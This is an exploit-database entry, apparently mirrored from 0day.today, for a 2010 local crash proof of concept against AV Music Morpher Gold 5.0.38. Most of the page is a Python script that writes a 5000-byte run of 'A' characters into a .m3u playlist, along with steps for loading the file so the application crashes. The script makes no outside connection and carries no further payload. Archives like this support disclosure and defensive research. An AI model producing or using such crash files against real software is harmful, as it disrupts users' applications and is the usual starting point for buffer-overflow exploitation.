Lucene search
+L

AV Music Morpher Gold 5.0.38 (.m3u) Denial of Service

🗓️ 20 Aug 2010 00:00:00Reported by b0telh0Type 
zdt
 zdt
🔗 0day.today👁 24 Views

AV Music Morpher Gold 5.0.38 (.m3u) Local Crash PoC, Denial of Servic

Code
=====================================================
AV Music Morpher Gold 5.0.38 (.m3u) Denial of Service
=====================================================

#!/usr/bin/python
#
# Exploit Title: AV Music Morpher Gold (.m3u) Local Crash PoC
# Date: 08-20-2010
# Author: b0telh0
# Software Link: http://www.musicmorpher.com/download.php?product=musicgold
# Version: 5.0.38
# Tested on: Windows XP SP3 (pt-br) VirtualBox
 
#
# *.acd and *.bdi files will crash the application too!
 
 
crash = "\x41" * 5000
 
try:
    file = open('b0t.m3u','w');
    file.write(crash);
    file.close();
    print "\n[+] b0t.m3u created."
    print "[+] Burner > Create New Audio CD > Right click and 'Add playlist'"
    print "[+] Select b0t.m3u and boom.\n"
except:
    print "\n[-] Error.. Error.. Error.. Error..\n"



#  0day.today [2018-01-01]  #

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

20 Aug 2010 00:00Current
7High risk
Vulners AI Score7
24